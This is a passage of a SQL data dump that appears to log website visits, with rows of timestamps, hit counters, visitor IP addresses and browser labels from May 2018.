233','other'),(239401,1525326410,1,1,0,0,'66.249.69.41','chrome'),(239402,1525327006,1,1,0,0,'8.29.198.26','other'),(239403,1525327379,1,1,0,0,'188.230.43.254','other'),(239404,1525327422,1,1,0,0,'91.196.178.87','firefox'),(239405,1525327437,1,1,0,0,'217.69.133.85','other'),(239406,1525327664,1,1,0,0,'54.36.148.12','other'),(239407,1525327762,8,8,0,0,'95.216.14.250','other'),(239408,1525327889,1,1,0,0,'54.36.148.106','other'),(239409,1525327965,1,1,0,0,'95.132.34.104','firefox'),(239410,1525327978,1,0,1,0,'66.249.69.35',''),(239411,1525328461,1,1,0,0,'54.36.148.68','other'),(239412,1525328493,1,1,0,0,'54.36.149.89','other'),(239413,1525328526,1,1,0,0,'54.36.148.182','other'),(239414,1525328749,32,32,0,0,'144.76.110.229','other'),(239415,1525328922,1,1,0,0,'91.124.182.170','firefox'),(239416,1525329022,1,1,0,0,'54.36.149.69','other'),(239417,1525329118,1,1,0,0,'54.36.149.106','other'),(239418,1525329191,1,1,0,0,'141.8.142.74','other'),(239419,1525329281,1,1,0,0,'213.5.192.35','chrome'),(239420,1525329361,3,3,0,0,'185.86.167.115','chrome'),(239421,1525329489,2,2,0,0,'198.54.113.48','chrome'),(239422,1525329535,1,1,0,0,'91.196.178.93','chrome'),(239423,1525329598,1,1,0,0,'54.165.59.7','other'),(239424,1525329646,1,0,1,0,'66.249.69.35',''),(239425,1525329763,1,1,0,0,'54.36.149.99','other'),(239426,1525329970,1,1,0,0,'54.36.148.15','other'),(239427,1525329996,1,1,0,0,'54.36.149.104','other'),(239428,1525330024,1,1,0,0,'66.249.69.89','chrome'),(239429,1525330203,1,1,0,0,'54.36.148.73','other'),(239430,1525330240,1,1,0,0,'54.36.148.158','other'),(239431,1525330493,1,1,0,0,'216.244.66.237','other'),(239432,1525330531,1,1,0,0,'54.36.148.233','other'),(239433,1525330558,1,1,0,0,'51.255.37.179','chrome'),(239434,1525330626,1,1,0,0,'54.36.148.69','other'),(239435,1525330661,1,1,0,0,'141.8.142.74','other'),(239436,1525330981,2,2,0,0,'178.20.159.183','chrome'),(239437,1525330996,1,1,0,0,'54.36.149.82','other'),(239438,1525331054,1,1,0,0,'54.36.148.172','other'),(239439,1525331232,1,1,0,0,'54.36.148.178','other'),(239440,1525331350,1,1,0,0,'54.36.148.235','other'),(239441,1525331400,1,1,0,0,'54.36.148.120','other'),(239442,1525331543,1,1,0,0,'54.36.148.125','other'),(239443,1525331596,1,1,0,0,'79.96.2.63','chrome'),(239444,1525332007,1,1,0,0,'192.81.222.95','chrome'),(239445,1525332070,1,1,0,0,'54.36.149.45','other'),(239446,1525332157,1,1,0,0,'88.202.226.187','chrome'),(239447,1525332201,1,1,0,0,'54.36.148.121','other'),(239448,1525332330,1,1,0,0,'146.185.158.9','chrome'),(239449,1525332357,1,1,0,0,'8.29.198.27','other'),(239450,1525332402,1,1,0,0,'54.36.148.12','other'),(239451,1525332406,1,1,0,0,'85.114.211.116','chrome'),(239452,1525332557,1,1,0,0,'54.36.148.68','other'),(239453,1525332578,1,1,0,0,'54.36.148.188','other'),(239454,1525332608,1,1,0,0,'54.36.149.103','other'),(239455,1525332616,1,1,0,0,'54.36.148.95','other'),(239456,1525332698,1,1,0,0,'141.8.142.74','other'),(239457,1525333245,4,4,0,0,'209.58.178.145','other'),(239458,1525333316,1,1,0,0,'91.196.178.87','firefox'),(239459,1525333435,1,1,0,0,'216.244.66.237','other'),(239460,1525333526,1,1,0,0,'54.36.149.80','other'),(239461,1525333539,1,1,0,0,'146.185.158.9','chrome'),(239462,1525333686,1,1,0,0,'66.249.69.39','chrome'),(239463,1525333703,1,1,0,0,'141.8.142.74','other'),(239464,1525333711,3,3,0,0,'178.20.159.183','chrome'),(239465,1525333905,2,2,0,0,'82.224.181.85','chrome'),(239466,1525334120,1,1,0,0,'91.196.178.97','chrome'),(239467,1525334433,1,1,0,0,'54.36.148.55','other'),(239468,1525334454,1,1,0,0,'77.111.244.69','chrome'),(239469,1525334490,1,1,0,0,'54.36.148.48','other'),(239470,1525334514,1,1,0,0,'54.36.149.21','other'),(239471,1525334533,1,1,0,0,'54.36.149.62','other'),(239472,1525334801,1,1,0,0,'54.36.148.77','other'),(239473,1525334886,1,1,0,0,'66.249.69.35','chrome'),(239474,1525335000,1,1,0,0,'54.36.149.28','other'),(239475,1525335073,1,1,0,0,'54.36.148.189','other'),(239476,1525335185,1,1,0,0,'54.36.149.82','other'),(239477,1525335271,1,0,1,0,'66.249.69.41',''),(239478,1525335280,1,1,0,0,'91.196.178.133','firefox'),(239479,1525335324,2,2,0,0,'89.140.72.84','chrome'),(239480,1525335582,1,1,0,0,'54.36.148.254','other'),(239481,1525335592,1,1,0,0,'54.36.148.31','other'),(239482,1525335644,1,1,0,0,'54.36.148.133','other'),(239483,1525335740,2,2,0,0,'186.202.126.141','chrome'),(239484,1525335916,1,1,0,0,'54.36.149.67','other'),(239485,1525335918,2,2,0,0,'91.196.178.97','chrome'),(239486,1525336011,1,1,0,0,'54.36.148.79','other'),(239487,1525336050,1,1,0,0,'54.36.149.10','other'),(239488,1525336162,1,1,0,0,'54.36.148.166','other'),(239489,1525336202,1,0,1,0,'66.249.69.41',''),(239490,1525336255,1,1,0,0,'54.36.148.121','other'),(239491,1525336282,1,1,0,0,'54.36.148.200','other'),(239492,1525336329,2,2,0,0,'213.159.215.202','chrome'),(239493,1525336348,1,1,0,0,'188.165.243.10','chrome'),(239494,1525336400,1,1,0,0,'54.36.149.101','other'),(239495,1525336439,1,1,0,0,'54.36.149.55','other'),(239496,1525336521,1,1,0,0,'54.36.149.76','other'),(239497,1525336809,1,1,0,0,'54.36.148.23','other'),(239498,1525337136,3,3,0,0,'216.244.66.237','other'),(239499,1525337226,1,1,0,0,'54.36.149.52','other'),(239500,1525337244,1,1,0,0,'66.249.69.93','chrome'),(239501,1525337274,1,1,0,0,'54.36.148.146','other'),(239502,1525337573,1,1,0,0,'54.36.148.185','other'),(239503,1525337608,1,1,0,0,'188.166.215.124','chrome'),(239504,1525337645,1,1,0,0,'185.98.7.126','chrome'),(239505,1525337646,1,1,0,0,'54.36.148.121','other'),(239506,1525337668,2,2,0,0,'91.189.123.230','chrome'),(239507,1525337818,1,1,0,0,'91.196.178.97','chrome'),(239508,1525337829,1,1,0,0,'212.90.148.14','chrome'),(239509,1525337861,1,1,0,0,'8.29.198.27','other'),(239510,1525338014,1,1,0,0,'54.36.149.76','other'),(239511,1525338152,1,1,0,0,'54.36.148.220','other'),(239512,1525338198,2,2,0,0,'195.10.210.70','chrome'),(239513,1525338368,1,1,0,0,'54.36.148.35','other'),(239514,1525338382,1,1,0,0,'54.36.149.66','other'),(239515,1525338443,1,1,0,0,'54.36.148.238','other'),(239516,1525338483,1,1,0,0,'54.36.148.24','other'),(239517,1525338770,1,1,0,0,'216.244.66.237','other'),(239518,1525338926,1,1,0,0,'54.36.148.86','other'),(239519,1525338944,1,1,0,0,'77.81.120.20','chrome'),(239520,1525339051,1,1,0,0,'141.8.142.74','other'),(239521,1525339290,1,1,0,0,'54.36.148.120','other'),(239522,1525339572,1,1,0,0,'54.36.148.130','other'),(239523,1525339656,1,1,0,0,'54.36.148.42','other'),(239524,1525339719,1,1,0,0,'54.36.148.57','other'),(239525,1525339796,1,1,0,0,'54.36.148.167','other'),(239526,1525339801,5,5,0,0,'91.196.178.93','chrome'),(239527,1525339809,45,45,0,0,'167.114.219.41','other'),(239528,1525340101,1,1,0,0,'66.249.69.35','chrome'),(239529,1525340143,2,2,0,0,'216.244.66.237','other'),(239530,1525340154,1,1,0,0,'54.36.148.139','other'),(239531,1525340281,1,1,0,0,'54.36.149.80','other'),(239532,1525340295,1,1,0,0,'54.36.149.104','other'),(239533,1525340331,1,1,0,0,'205.186.184.14','chrome'),(239534,1525340681,1,1,0,0,'54.36.149.31','other'),(239535,1525340709,1,1,0,0,'54.36.148.65','other'),(239536,1525340906,1,1,0,0,'54.36.148.151','other'),(239537,1525341497,1,1,0,0,'54.36.148.62','other'),(239538,1525341612,3,3,0,0,'88.151.101.15','chrome'),(239539,1525341846,1,1,0,0,'54.36.149.64','other'),(239540,1525341954,2,2,0,0,'216.244.66.237','other'),(239541,1525341976,1,1,0,0,'54.36.148.126','other'),(239542,1525342064,1,1,0,0,'54.36.148.78','other'),(239543,1525342156,1,1,0,0,'54.36.149.46','other'),(239544,1525342427,1,1,0,0,'54.36.148.207','other'),(239545,1525342450,1,1,0,0,'54.36.149.80','other'),(239546,1525342717,1,1,0,0,'54.36.148.249','other'),(239547,1525342749,1,1,0,0,'54.36.148.124','other'),(239548,1525342826,2,2,0,0,'202.172.28.199','chrome'),(239549,1525342894,2,2,0,0,'216.244.66.237','other'),(239550,1525343094,1,1,0,0,'81.31.155.72','chrome'),(239551,1525343185,1,1,0,0,'8.29.198.26','other'),(239552,1525343290,2,2,0,0,'184.168.200.161','chrome'),(239553,1525343474,1,1,0,0,'54.36.148.166','other'),(239554,1525343723,1,1,0,0,'54.36.148.183','other'),(239555,1525343769,1,1,0,0,'54.36.149.86','other'),(239556,1525343863,1,0,1,0,'66.249.69.41',''),(239557,1525344226,1,1,0,0,'54.36.148.92','other'),(239558,1525344232,1,1,0,0,'54.36.148.253','other'),(239559,1525344365,1,1,0,0,'54.36.149.1','other'),(239560,1525344597,1,1,0,0,'54.36.149.106','other'),(239561,1525344602,1,1,0,0,'54.36.149.56','other'),(239562,1525344641,1,1,0,0,'54.36.148.128','other'),(239563,1525344935,1,1,0,0,'54.36.149.70','other'),(239564,1525345051,1,1,0,0,'176.31.126.110','chrome'),(239565,1525345094,2,2,0,0,'198.54.113.48','chrome'),(239566,1525345275,1,1,0,0,'87.250.224.96','other'),(239567,1525345343,1,1,0,0,'54.36.148.31','other'),(239568,1525345406,1,1,0,0,'54.36.149.104','other'),(239569,1525345521,1,1,0,0,'192.99.35.121','chrome'),(239570,1525345543,1,1,0,0,'54.36.148.208','other'),(239571,1525345590,1,1,0,0,'54.36.149.38','other'),(239572,1525345851,1,1,0,0,'216.244.66.237','other'),(239573,1525345881,1,1,0,0,'54.36.148.72','other'),(239574,1525346055,1,1,0,0,'54.36.148.92','other'),(239575,1525346104,1,1,0,0,'54.36.148.59','other'),(239576,1525346118,1,1,0,0,'54.36.149.102','other'),(239577,1525346348,1,1,0,0,'54.36.148.126','other'),(239578,1525346477,1,1,0,0,'54.36.148.100','other'),(239579,1525346486,1,1,0,0,'95.132.34.104','firefox'),(239580,1525346657,1,1,0,0,'54.36.148.27','other'),(239581,1525346720,1,1,0,0,'54.36.148.135','other'),(239582,1525346733,1,1,0,0,'54.36.149.88','other'),(239583,1525346808,2,2,0,0,'88.151.101.15','chrome'),(239584,1525346907,1,1,0,0,'93.125.99.83','chrome'),(239585,1525347115,1,1,0,0,'87.250.224.46','other'),(239586,1525347191,1,1,0,0,'54.36.149.45','other'),(239587,1525347220,1,1,0,0,'54.36.148.144','other'),(239588,1525347237,1,1,0,0,'54.36.148.62','other'),(239589,1525347300,1,1,0,0,'54.36.149.3','other'),(239590,1525347656,1,1,0,0,'54.36.149.26','other'),(239591,1525347658,1,1,0,0,'37.9.113.115','other'),(239592,1525347779,1,1,0,0,'54.36.148.58','other'),(239593,1525347781,1,1,0,0,'54.36.148.48','other'),(239594,1525347798,1,1,0,0,'91.209.11.236','other'),(239595,1525347891,1,1,0,0,'54.36.148.199','other'),(239596,1525348263,1,1,0,0,'212.90.148.14','chrome'),(239597,1525348330,1,1,0,0,'54.36.148.128','other'),(239598,1525348383,2,2,0,0,'91.196.177.46','chrome'),(239599,1525348435,1,1,0,0,'191.252.94.90','chrome'),(239600,1525348650,1,1,0,0,'54.36.148.248','other'),(239601,1525348714,1,1,0,0,'8.29.198.26','other'),(239602,1525348779,1,1,0,0,'54.36.149.17','other'),(239603,1525348866,1,1,0,0,'54.36.148.162','other'),(239604,1525348874,1,1,0,0,'54.36.148.245','other'),(239605,1525348916,1,1,0,0,'54.36.148.42','other'),(239606,1525349114,1,1,0,0,'216.244.66.237','other'),(239607,1525349204,1,1,0,0,'54.36.149.16','other'),(239608,1525349256,1,1,0,0,'54.36.148.37','other'),(239609,1525349306,1,1,0,0,'54.36.148.109','other'),(239610,1525349574,1,1,0,0,'37.9.113.182','other'),(239611,1525349601,2,2,0,0,'108.59.8.70','other'),(239612,1525349622,3,3,0,0,'202.218.119.118','chrome'),(239613,1525349796,1,1,0,0,'54.36.149.81','other'),(239614,1525350061,1,1,0,0,'54.36.149.37','other'),(239615,1525350235,1,1,0,0,'54.36.148.72','other'),(239616,1525350248,1,1,0,0,'91.196.178.97','chrome'),(239617,1525350338,1,1,0,0,'54.36.148.29','other'),(239618,1525350475,1,1,0,0,'54.36.148.120','other'),(239619,1525350678,1,1,0,0,'54.36.149.21','other'),(239620,1525350754,1,1,0,0,'54.36.148.204','other'),(239621,1525350766,1,1,0,0,'54.36.149.55','other'),(239622,1525350837,1,1,0,0,'54.36.149.90','other'),(239623,1525350887,2,2,0,0,'91.196.178.8','chrome'),(239624,1525350963,2,2,0,0,'66.79.163.22','chrome'),(239625,1525351107,1,1,0,0,'54.36.148.102','other'),(239626,1525351249,1,1,0,0,'54.36.148.115','other'),(239627,1525351261,1,1,0,0,'95.213.143.6','chrome'),(239628,1525351349,1,1,0,0,'54.36.149.35','other'),(239629,1525351382,1,1,0,0,'54.36.148.67','other'),(239630,1525351399,1,1,0,0,'185.98.7.140','chrome'),(239631,1525351459,1,1,0,0,'173.236.26.18','chrome'),(239632,1525351501,1,1,0,0,'54.36.148.34','other'),(239633,1525351518,1,1,0,0,'54.36.148.181','other'),(239634,1525351584,1,1,0,0,'54.36.148.162','other'),(239635,1525351606,1,1,0,0,'216.244.66.237','other'),(239636,1525351639,1,1,0,0,'54.36.149.89','other'),(239637,1525351772,1,1,0,0,'54.36.148.242','other'),(239638,1525351786,1,1,0,0,'54.36.149.79','other'),(239639,1525352017,1,1,0,0,'54.36.148.201','other'),(239640,1525352432,1,1,0,0,'54.36.149.51','other'),(239641,1525352439,1,1,0,0,'81.88.49.5','chrome'),(239642,1525352534,1,1,0,0,'37.9.171.95','chrome'),(239643,1525352849,1,1,0,0,'216.244.66.237','other'),(239644,1525353009,2,2,0,0,'91.98.98.50','chrome'),(239645,1525353027,1,1,0,0,'54.36.148.89','other'),(239646,1525353050,1,1,0,0,'54.36.148.234','other'),(239647,1525353220,1,1,0,0,'130.180.220.46','chrome'),(239648,1525353262,1,1,0,0,'198.71.227.10','chrome'),(239649,1525353272,1,1,0,0,'54.36.149.31','other'),(239650,1525353339,1,1,0,0,'54.36.148.161','other'),(239651,1525353425,1,1,0,0,'54.36.148.158','other'),(239652,1525353443,1,1,0,0,'54.36.148.186','other'),(239653,1525353634,1,1,0,0,'54.36.148.90','other'),(239654,1525353661,1,1,0,0,'54.36.148.114','other'),(239655,1525353664,1,1,0,0,'54.36.148.58','other'),(239656,1525353724,1,1,0,0,'54.36.148.206','other'),(239657,1525353794,1,1,0,0,'216.244.66.237','other'),(239658,1525353957,1,1,0,0,'54.36.149.69','other'),(239659,1525354015,1,1,0,0,'8.29.198.26','other'),(239660,1525354054,1,1,0,0,'80.252.184.10','chrome'),(239661,1525354118,1,1,0,0,'54.36.149.57','other'),(239662,1525354914,1,1,0,0,'54.36.148.219','other'),(239663,1525354967,1,1,0,0,'54.36.148.230','other'),(239664,1525355183,1,1,0,0,'54.36.149.27','other'),(239665,1525355360,1,1,0,0,'141.8.142.74','other'),(239666,1525355698,1,1,0,0,'54.36.148.75','other'),(239667,1525355802,1,1,0,0,'54.36.149.48','other'),(239668,1525356077,1,1,0,0,'54.36.148.235','other'),(239669,1525356227,1,1,0,0,'54.36.148.32','other'),(239670,1525356246,1,1,0,0,'40.77.167.79','other'),(239671,1525356274,1,1,0,0,'54.36.148.129','other'),(239672,1525356302,1,1,0,0,'180.76.15.162','other'),(239673,1525356509,1,1,0,0,'54.36.148.16','other'),(239674,1525356588,1,1,0,0,'81.88.49.26','chrome'),(239675,1525356657,1,1,0,0,'81.88.49.35','chrome'),(239676,1525356712,1,1,0,0,'54.36.148.22','other'),(239677,1525357079,1,1,0,0,'91.196.178.169','chrome'),(239678,1525357088,1,1,0,0,'54.36.148.65','other'),(239679,1525357142,1,1,0,0,'54.36.149.40','other'),(239680,1525357388,1,1,0,0,'93.125.99.69','chrome'),(239681,1525357612,1,1,0,0,'198.211.121.79','chrome'),(239682,1525357725,1,1,0,0,'188.230.43.254','other'),(239683,1525357852,1,1,0,0,'91.196.178.90','firefox'),(239684,1525357853,1,1,0,0,'54.36.149.3','other'),(239685,1525357958,2,2,0,0,'46.174.163.134','chrome'),(239686,1525358106,1,1,0,0,'195.114.18.165','chrome'),(239687,1525358178,1,1,0,0,'81.88.49.57','chrome'),(239688,1525358210,1,1,0,0,'81.88.49.36','chrome'),(239689,1525358244,2,2,0,0,'91.196.178.164','chrome'),(239690,1525358565,2,2,0,0,'216.244.66.237','other'),(239691,1525358660,1,1,0,0,'54.36.148.182','other'),(239692,1525358667,1,1,0,0,'178.154.200.28','other'),(239693,1525359046,1,1,0,0,'91.196.178.97','chrome'),(239694,1525359298,1,1,0,0,'89.163.145.206','chrome'),(239695,1525359303,2,2,0,0,'50.62.161.185','chrome'),(239696,1525359385,1,1,0,0,'54.36.148.65','other'),(239697,1525359412,1,1,0,0,'54.36.149.35','other'),(239698,1525359474,1,1,0,0,'54.36.149.50','other'),(239699,1525359563,1,1,0,0,'8.29.198.25','other'),(239700,1525359649,2,2,0,0,'91.196.178.15','chrome'),(239701,1525359739,1,1,0,0,'54.36.148.215','other'),(239702,1525359747,2,2,0,0,'178.32.13.93','chrome'),(239703,1525359765,2,2,0,0,'78.46.98.216','chrome'),(239704,1525359782,2,2,0,0,'37.54.114.62','chrome'),(239705,1525359886,2,2,0,0,'216.244.66.237','other'),(239706,1525359912,1,1,0,0,'54.36.149.4','other'),(239707,1525360165,1,1,0,0,'54.36.148.102','other'),(239708,1525360180,1,1,0,0,'54.36.149.45','other'),(239709,1525360240,1,1,0,0,'54.36.148.175','other'),(239710,1525360243,1,1,0,0,'54.36.149.99','other'),(239711,1525360266,1,1,0,0,'54.36.148.140','other'),(239712,1525360281,1,1,0,0,'188.230.43.254','other'),(239713,1525360334,1,1,0,0,'54.36.148.79','other'),(239714,1525360528,1,1,0,0,'54.36.149.12','other'),(239715,1525360617,1,1,0,0,'54.36.148.74','other'),(239716,1525360730,1,1,0,0,'81.88.49.24','chrome'),(239717,1525360731,1,1,0,0,'81.88.49.40','chrome'),(239718,1525360972,1,1,0,0,'54.36.149.14','other'),(239719,1525360974,1,1,0,0,'193.106.30.99','firefox'),(239720,1525361191,3,3,0,0,'37.143.11.157','chrome'),(239721,1525361319,2,2,0,0,'216.244.66.237','other'),(239722,1525361391,1,1,0,0,'185.68.109.213','chrome'),(239723,1525361712,1,1,0,0,'141.8.142.74','other'),(239724,1525361754,1,1,0,0,'54.36.148.90','other'),(239725,1525361978,1,1,0,0,'54.36.148.250','other'),(239726,1525362168,1,1,0,0,'54.36.149.45','other'),(239727,1525362171,1,1,0,0,'54.36.148.167','other'),(239728,1525362201,1,1,0,0,'54.36.149.9','other'),(239729,1525362244,1,1,0,0,'157.55.39.76','other'),(239730,1525362292,1,1,0,0,'54.36.148.94','other'),(239731,1525362522,1,1,0,0,'188.230.43.254','other'),(239732,1525362573,1,1,0,0,'216.244.66.237','other'),(239733,1525362865,1,1,0,0,'54.36.149.10','other'),(239734,1525362899,1,1,0,0,'54.36.149.96','other'),(239735,1525362912,1,1,0,0,'103.67.235.97','chrome'),(239736,1525362954,1,1,0,0,'54.36.148.210','other'),(239737,1525363117,1,1,0,0,'54.36.148.24','other'),(239738,1525363233,1,1,0,0,'54.36.149.14','other'),(239739,1525363338,1,1,0,0,'54.36.149.15','other'),(239740,1525363346,1,1,0,0,'54.36.148.217','other'),(239741,1525363559,1,1,0,0,'54.36.148.242','other'),(239742,1525363853,1,1,0,0,'54.36.148.78','other'),(239743,1525363861,1,1,0,0,'54.36.148.83','other'),(239744,1525363870,1,1,0,0,'54.36.149.63','other'),(239745,1525364065,1,1,0,0,'157.55.39.76','other'),(239746,1525364099,2,2,0,0,'91.196.178.164','chrome'),(239747,1525364160,1,1,0,0,'54.36.149.29','other'),(239748,1525364182,1,1,0,0,'188.127.239.161','chrome'),(239749,1525364331,1,1,0,0,'54.36.148.66','other'),(239750,1525364360,1,1,0,0,'54.36.148.221','other'),(239751,1525364361,1,1,0,0,'216.244.66.237','other'),(239752,1525364445,1,1,0,0,'54.36.149.78','other'),(239753,1525364489,1,1,0,0,'54.36.148.173','other'),(239754,1525364720,1,1,0,0,'54.36.149.69','other'),(239755,1525364852,1,1,0,0,'8.29.198.26','other'),(239756,1525364948,1,1,0,0,'188.230.43.254','other'),(239757,1525364955,1,1,0,0,'54.36.148.105','other'),(239758,1525365000,1,1,0,0,'54.36.148.36','other'),(239759,1525365106,2,2,0,0,'67.212.240.177','chrome'),(239760,1525365397,1,1,0,0,'54.36.148.144','other'),(239761,1525365559,1,1,0,0,'54.36.148.34','other'),(239762,1525365593,1,1,0,0,'54.36.148.45','other'),(239763,1525365968,1,1,0,0,'144.76.185.181','other'),(239764,1525365981,1,1,0,0,'54.36.149.23','other'),(239765,1525366087,1,1,0,0,'54.36.148.113','other'),(239766,1525366133,1,1,0,0,'219.94.129.181','chrome'),(239767,1525366282,1,1,0,0,'210.224.185.208','chrome'),(239768,1525366396,1,1,0,0,'40.77.167.171','other'),(239769,1525366438,1,1,0,0,'54.36.148.41','other'),(239770,1525366511,1,1,0,0,'54.36.149.73','other'),(239771,1525366597,1,1,0,0,'54.36.148.69','other'),(239772,1525366698,1,1,0,0,'207.46.13.58','other'),(239773,1525366803,1,1,0,0,'54.36.149.80','other'),(239774,1525366820,1,1,0,0,'216.244.66.237','other'),(239775,1525367114,1,1,0,0,'54.36.148.22','other'),(239776,1525367120,1,1,0,0,'54.36.148.254','other'),(239777,1525367206,1,1,0,0,'54.36.148.82','other'),(239778,1525367459,2,2,0,0,'178.95.67.226','chrome'),(239779,1525367484,1,1,0,0,'54.201.138.117','chrome'),(239780,1525367543,1,1,0,0,'54.36.148.88','other'),(239781,1525367611,2,2,0,0,'185.86.167.115','chrome'),(239782,1525367740,1,1,0,0,'43.227.134.243','other'),(239783,1525367747,1,1,0,0,'54.36.149.79','other'),(239784,1525367842,1,1,0,0,'54.36.148.214','other'),(239785,1525368038,1,1,0,0,'216.244.66.237','other'),(239786,1525368134,1,1,0,0,'54.36.148.85','other'),(239787,1525368552,1,1,0,0,'54.36.148.160','other'),(239788,1525368774,1,1,0,0,'54.36.148.226','other'),(239789,1525368797,1,1,0,0,'54.36.148.193','other'),(239790,1525368886,1,1,0,0,'54.36.148.12','other'),(239791,1525368900,1,1,0,0,'54.36.148.207','other'),(239792,1525368906,1,1,0,0,'54.36.148.142','other'),(239793,1525369235,1,1,0,0,'54.36.149.73','other'),(239794,1525369277,1,1,0,0,'54.36.149.64','other'),(239795,1525369337,1,1,0,0,'157.55.39.76','other'),(239796,1525369640,2,2,0,0,'176.9.161.230','chrome'),(239797,1525369817,1,1,0,0,'54.36.149.63','other'),(239798,1525369940,1,1,0,0,'54.36.148.238','other'),(239799,1525370020,1,1,0,0,'54.36.148.185','other'),(239800,1525370179,1,1,0,0,'54.36.148.177','other'),(239801,1525370205,1,1,0,0,'54.36.149.56','other'),(239802,1525370410,1,1,0,0,'8.29.198.27','other'),(239803,1525370462,1,1,0,0,'207.102.138.158','chrome'),(239804,1525370569,1,1,0,0,'54.36.148.58','other'),(239805,1525370675,1,1,0,0,'54.36.149.79','other'),(239806,1525370918,1,1,0,0,'54.36.149.63','other'),(239807,1525370955,1,1,0,0,'54.36.148.128','other'),(239808,1525371063,2,2,0,0,'216.244.66.237','other'),(239809,1525371141,1,1,0,0,'54.36.149.9','other'),(239810,1525371364,1,1,0,0,'54.36.148.137','other'),(239811,1525371486,1,1,0,0,'54.36.149.1','other'),(239812,1525371585,4,4,0,0,'88.99.19.242','other'),(239813,1525371936,1,1,0,0,'54.36.149.28','other'),(239814,1525371951,1,1,0,0,'54.36.149.48','other'),(239815,1525372111,2,2,0,0,'216.244.66.237','other'),(239816,1525372219,1,1,0,0,'54.36.149.59','other'),(239817,1525372632,1,1,0,0,'37.204.65.93','msie'),(239818,1525372633,1,1,0,0,'95.221.57.200','msie'),(239819,1525372654,1,1,0,0,'91.196.178.86','chrome'),(239820,1525372662,1,1,0,0,'54.36.149.61','other'),(239821,1525372755,1,1,0,0,'54.36.148.217','other'),(239822,1525373027,1,1,0,0,'54.36.148.150','other'),(239823,1525373150,1,1,0,0,'54.36.148.210','other'),(239824,1525373186,1,1,0,0,'54.36.148.139','other'),(239825,1525373326,1,1,0,0,'54.36.148.184','other'),(239826,1525373369,2,2,0,0,'54.36.148.236','other'),(239827,1525373375,1,1,0,0,'54.36.148.88','other'),(239828,1525373452,1,1,0,0,'54.36.149.89','other'),(239829,1525373538,1,1,0,0,'87.250.224.39','other'),(239830,1525373583,1,1,0,0,'54.36.148.53','other'),(239831,1525373633,1,1,0,0,'54.36.148.112','other'),(239832,1525373780,1,1,0,0,'37.55.59.117','chrome'),(239833,1525373797,2,2,0,0,'216.244.66.237','other'),(239834,1525374082,1,1,0,0,'54.36.148.143','other'),(239835,1525374177,1,1,0,0,'54.36.148.24','other'),(239836,1525374352,1,1,0,0,'54.36.148.119','other'),(239837,1525374484,1,1,0,0,'54.36.149.98','other'),(239838,1525374672,1,1,0,0,'54.36.148.173','other'),(239839,1525374728,1,1,0,0,'54.36.148.109','other'),(239840,1525374846,1,1,0,0,'54.36.148.75','other'),(239841,1525374990,1,1,0,0,'54.36.149.100','other'),(239842,1525375351,1,1,0,0,'54.36.148.21','other'),(239843,1525375571,1,1,0,0,'54.36.148.23','other'),(239844,1525375580,1,1,0,0,'54.36.148.150','other'),(239845,1525375581,1,1,0,0,'54.36.148.191','other'),(239846,1525375629,1,1,0,0,'54.36.148.48','other'),(239847,1525375681,1,1,0,0,'8.29.198.27','other'),(239848,1525375995,4,4,0,0,'91.196.178.163','chrome'),(239849,1525376018,1,1,0,0,'54.36.148.68','other'),(239850,1525376097,1,1,0,0,'54.36.148.89','other'),(239851,1525376170,1,1,0,0,'40.77.167.171','other'),(239852,1525376173,1,1,0,0,'95.132.69.217','chrome'),(239853,1525376225,1,1,0,0,'54.36.149.59','other'),(239854,1525376502,1,1,0,0,'54.36.148.197','other'),(239855,1525376509,1,1,0,0,'120.77.159.175','other'),(239856,1525376611,1,1,0,0,'54.36.149.53','other'),(239857,1525376722,1,1,0,0,'54.36.149.40','other'),(239858,1525376727,1,1,0,0,'54.36.148.145','other'),(239859,1525377173,1,1,0,0,'54.36.148.229','other'),(239860,1525377286,1,1,0,0,'54.36.148.240','other'),(239861,1525377380,1,1,0,0,'54.36.148.100','other'),(239862,1525377447,1,1,0,0,'54.36.148.170','other'),(239863,1525377513,1,1,0,0,'54.36.149.79','other'),(239864,1525378184,1,1,0,0,'216.244.66.237','other'),(239865,1525378207,1,1,0,0,'54.36.148.119','other'),(239866,1525378219,1,1,0,0,'54.36.148.206','other'),(239867,1525378313,1,1,0,0,'54.36.149.90','other'),(239868,1525378323,1,1,0,0,'54.36.149.104','other'),(239869,1525378612,1,1,0,0,'54.36.148.57','other'),(239870,1525378987,2,2,0,0,'66.79.163.22','chrome'),(239871,1525379025,1,1,0,0,'54.36.148.20','other'),(239872,1525379248,1,1,0,0,'178.154.200.41','other'),(239873,1525379405,4,4,0,0,'216.244.66.237','other'),(239874,1525379432,1,1,0,0,'54.36.148.170','other'),(239876,1525379485,1,1,0,0,'54.36.148.110','other'),(239877,1525379750,1,1,0,0,'54.36.149.17','other'),(239878,1525379900,1,1,0,0,'54.36.148.226','other'),(239879,1525379961,1,1,0,0,'54.36.148.176','other'),(239880,1525380087,1,1,0,0,'54.36.148.232','other'),(239881,1525380162,1,1,0,0,'54.36.148.38','other'),(239882,1525380167,1,1,0,0,'91.196.178.103','chrome'),(239883,1525380263,1,1,0,0,'54.36.148.222','other'),(239884,1525380454,1,1,0,0,'54.36.148.77','other'),(239885,1525380736,1,1,0,0,'54.36.148.157','other'),(239886,1525380775,1,1,0,0,'54.36.149.73','other'),(239887,1525380783,1,1,0,0,'54.36.149.9','other'),(239888,1525380929,1,1,0,0,'54.36.149.21','other'),(239889,1525381259,1,1,0,0,'8.29.198.27','other'),(239890,1525381422,1,1,0,0,'54.36.149.53','other'),(239891,1525381470,1,1,0,0,'54.36.148.145','other'),(239892,1525381520,1,1,0,0,'54.36.148.237','other'),(239893,1525381615,1,1,0,0,'54.36.149.64','other'),(239894,1525381764,1,1,0,0,'178.154.171.24','other'),(239895,1525381776,1,1,0,0,'54.36.148.49','other'),(239896,1525382334,1,1,0,0,'54.36.148.67','other'),(239897,1525382522,1,1,0,0,'54.36.149.64','other'),(239898,1525382527,2,2,0,0,'54.36.148.147','other'),(239899,1525382685,1,1,0,0,'54.36.149.37','other'),(239900,1525382822,1,1,0,0,'54.36.148.229','other'),(239901,1525382935,1,1,0,0,'54.36.148.136','other'),(239902,1525382999,1,1,0,0,'54.36.149.72','other'),(239903,1525383080,1,1,0,0,'54.36.148.81','other'),(239904,1525383092,1,1,0,0,'54.36.149.31','other'),(239905,1525383571,1,1,0,0,'216.244.66.237','other'),(239906,1525383840,1,1,0,0,'54.36.149.77','other'),(239907,1525384053,1,1,0,0,'54.36.148.204','other'),(239908,1525384079,1,1,0,0,'218.66.74.50','other'),(239909,1525384274,1,1,0,0,'54.36.148.151','other'),(239910,1525384447,1,1,0,0,'54.36.148.46','other'),(239911,1525385130,3,3,0,0,'216.244.66